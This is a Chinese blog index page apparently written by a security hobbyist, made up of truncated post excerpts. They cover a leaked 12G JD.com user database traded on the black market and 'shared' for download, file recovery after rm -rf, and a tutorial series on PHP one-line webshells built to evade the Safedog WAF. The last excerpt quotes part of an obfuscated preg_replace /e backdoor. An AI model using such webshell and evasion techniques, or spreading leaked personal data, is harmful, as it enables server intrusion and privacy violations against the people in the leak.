繼最新京東泄露12G的用戶數據褲子下載分享【這集你肯定沒看過！】之后。 兩天過去了，瓜也差不多快吃完了， 大家奮不顧身探索京東12G的熱情也稍微散去了些，現在回想起來也是心有余悸，那些個非死命找我要12G陸小鳳傳奇電影的瓜友，你們腫么了，搞得我也想下下來看看，生怕錯過了什么。 …繼續閱讀 »

獨家分享！ 炸了，炸了！社工褲再次強大了一波！ 這幾天黑市上出現重磅“炸彈”，一個12G的數據包開始流通，其中包括用戶名、密碼、郵箱、QQ號、電話號碼、身份證等多個維度，數據多達數千萬條。 這12G的數據包，黑產再次被攪動。 一些地下渠道，開始對數據進行明碼標價交易，價格從…繼續閱讀 »

linux中rm -rf xxx后一秒發現刪除文件，那一刻是崩潰的，別問我今天經歷了寫什么，就是搞事情?。?！ 一般linux中可用的恢復軟件是不多的，一開始我試了testdisk，但是苦于文件格式是xfs的，竟然不支持。 下載地址：http://www.cgsecurity.org/wiki/TestDisk_Download   然后想到vmware應該有單獨的工具…繼續閱讀 »

eval與assert都算是元老級一句話后門函數，其實很多情形下代碼的執行還是需要依靠eval去執行，只是前鋒路轉了而已。 eval與assert函數的用法大家可以自行百度。 eval與assert區別 eval函數中參數是字符，如： eval('echo 1;'); assert函數中參數為表達式 （或者為函數），如： assert(phpinfo()) assert(eval('ec…繼續閱讀 »

聲明： 本文由博主首發于：阿里先知?https://xianzhi.aliyun.com/forum/read/441.html 如需要轉載，請先聯系先知技術社區授權；未經授權請勿轉載。 上一篇：php一句話后門過狗姿勢萬千之理論篇【一】 第二章節主要帶給大家一些后門構造思路，與安全狗文件特征檢測的機制。 另外強調一下，這篇文章需…繼續閱讀 »

聲明： 本文由博主首發于：阿里先知?https://xianzhi.aliyun.com/forum/read/442.html 如需要轉載，請先聯系先知技術社區授權；未經授權請勿轉載。 先知技術社區投稿郵箱：Aliyun_xianzhi#service.alibaba.com   既然木馬已就緒，那么想要利用木馬，必然有一個數據傳輸的過程，數據提交是必須的，數據返回…繼續閱讀 »

聲明： 本文由博主首發于：阿里先知?https://xianzhi.aliyun.com/forum/read/441.html 如需要轉載，請先聯系先知技術社區授權；未經授權請勿轉載。 寫在前面： 過狗相關的資料網上也是有很多，所以在我接下來的文章中，可能觀點或者舉例可能會與網上部分雷同，或者表述不夠全面。 但是我只能說，我…繼續閱讀 »

雙十一，沒什么好說的，對這個具有中國現代主義特色的節日，可以總結為三個字，買買買。 對于雙十一的商業與經濟角度，不再做評價，知乎上的回答更有深度。 畢竟我只是一個平民，討論那些個經濟事態，國際化雙十一，跟我有個什么卵關系（馬云爸爸曾經也說過類似的大實話） 那么作為I…繼續閱讀 »

最近研究過狗一句話有點走火入魔，目前研究了幾個版本的一句話，效果都還不錯。 授之于魚不如授之以漁，過幾天準備從理論層，代碼層，傳輸層寫個過狗連載教程。 目前我使用的是cknife軟件，類似于菜刀的開源軟件，雖然還有不少bug，但高度自由修改，不用擔心后門。我之所以沒有用菜刀，…繼續閱讀 »

今天偶然在土司看到一篇關于php后門的問題，讓我聯想到以前遇到過的一個一句話，共同點都是利用preg_replace中/e 修正符使replacement 參數當作 PHP 代碼來執行。 先來看下原版代碼 <?php $Base = "base6"."4"."_decod"."e"; $_clasc = $Base($_REQUEST['_exit']); $arr = array($Base($_POST['mcontent']) => '|.*|e',); @array_walk($arr, $_cla…繼續閱讀 »